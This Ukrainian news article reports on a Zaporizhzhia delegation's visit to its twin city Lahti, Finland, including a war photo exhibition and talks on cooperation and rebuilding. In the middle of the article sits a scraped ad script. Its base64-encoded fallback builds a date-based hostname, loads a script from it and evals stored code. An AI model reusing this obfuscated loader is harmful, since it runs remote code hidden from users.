Відбулась зустріч представників міст-побратимів Запоріжжя та Лахті (ФОТО)

В роковини повномасштабного російського військового вторгнення до України в м. Лахті, Фінляндія відбулось відкриття фотовиставки «Війна в нашому домi: Запоріжжя». Проведення виставки було ініційоване запорізькою громадською організацією «Гуманітарно-інформаційний центр» та підтримано виконавчим комітетом Запорізької міської ради, мерією м. Лахті i YMCA України в Запорізькiй області.

В експозиції були представлені тематичні стенди, що висвітлюють війну Росії проти України, а також фотороботи, поділені на два етапи: «Запоріжжя без війни» i «Запоріжжя у війні».

Свої роботи для виставки надали запорізькі фотокореспонденти Дмитро Смольенко, Катя Клочко, Олена Тіта, ГУ ДСНС України в Запорізькій області, фотохудожники Олег Бурбовський, Ігор та Сергій Лаврови, львівський фотокореспондент Олег Огородник, фотокор «Радіо Свободна Європа» i «Радіо Свобода» Сергій Нужненко, запорізький військовий журналіст Олександр Павлов, французький фотожурналіст Рафаель Ягобзаде.

До складу запорізької делегації увійшли голова правління Гуманітарно-інформаційного центру м. Запоріжжя Костянтин Гургура, директор департаменту економічного розвитку Запорізької міської ради Наталія Новак, начальник управління культури департаменту культури і туризму Запорізької міської ради Сергій Білов, керівник Гуманітарно-інформаційного центру Наталія Єльцова, запорізькі піприємці Сергій Касьянов та Олександр Лисенко, перекладач Марія Затонова.

У відкритті виставки, яке пройшло 21 лютого, взяли участь мер м. Лахті Пекка Тимонен, перший секретар Посольства України у Фінляндській Республіці Олена Цiвінська, засновник і голова правління Фінсько-Української асоціації національної оборони Кирил Ринне та голова правління Товариства українців в Фінляндії Василь Гуцул.

Звертаючись до присутніх, голова запорізької делегації Костянтин Гургура, висловив глибоку подяку жителям Лахті і, в цілому, фінському народу за ту підтримку i допомогу, яку вони надають українським громадянам і державі Україна.

«Наша делегація, — зазначив він окремо, — поставила перед собою за мету відновлення співпраці між нашими містами в різних сферах діяльності. З тим щоб побудувати взаємовигідні відносини, які допоможуть у подоланні кризових явищ в економіці, гуманітарній сфері i також стануть надійною опорою у період відновлення України після війни».

«Українці дуже миролюбні люди, — наголосила у своєму виступі Олена Цивінська, — і ми не обирали цю війну. Але сьогодні ми боремося за нашу незалежність та свободу, за наше щасливе майбутнє. Сьогоднішня зустріч та факт проведення цієї віставки говорить про солідарність між нашими народами у боротьбі проти загарбницьких планів Росії».
var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

У своєму виступі мер Лахті Пекка Тімонен зазначив, що зустріч відбувається у рік сімдесятиріччя встановлення побратимських відносин між Запоріжжям та Лахті, пообіцяв усіляке сприяння у всіх починаннях та зробив напис із побажаннями запорожцям на українському прапорі.

Разом з фотовиставкою відбулись робочі зустрічі української та фінської сторін, присвячені розвитку ділового співробітництва у сфері освіти, культури, енергозберігаючих технологій та екології, питанням відновлення міської інфраструктури та відбудови Запорiжжя після війни. Зокрема, це плідна розмова з директором з економічного розвитку міста Лахті Маркусом Ланкиненом та директором з охорони навколишнього середовища Елiной Ойала.

Також запорізька делегація вівідала університет LUT/LUB, де ознайомилась з науково-дослідними проектами, зокрема з проектом «Вуглецево-нейтральний Лахті 2025».

plakaty

Для довідки. Лахті – перше місто-побратим Запоріжжя. Договір про побратимство був підписаний в 1953 роцi з ініціативи фінської сторони. У 70-80-ті роки минулого століття Запоріжжя та Лахті активно співпрацювали – здійснювалися численні обміни делегаціями у різних сферах. Одна з перших вулиць нового на той момент Хортицького мікрорайону Запоріжжя, вул. Лахтинська, була названа на честь міста-побратима. В свою чергу, в Лахті на честь Запоріжжя назвали великий парк в центрі міста.

Підписуйтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/vidbulas-zustrich-predstavnikiv-mist-pobratimiv-zaporizhzhya-ta-lahti-foto/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top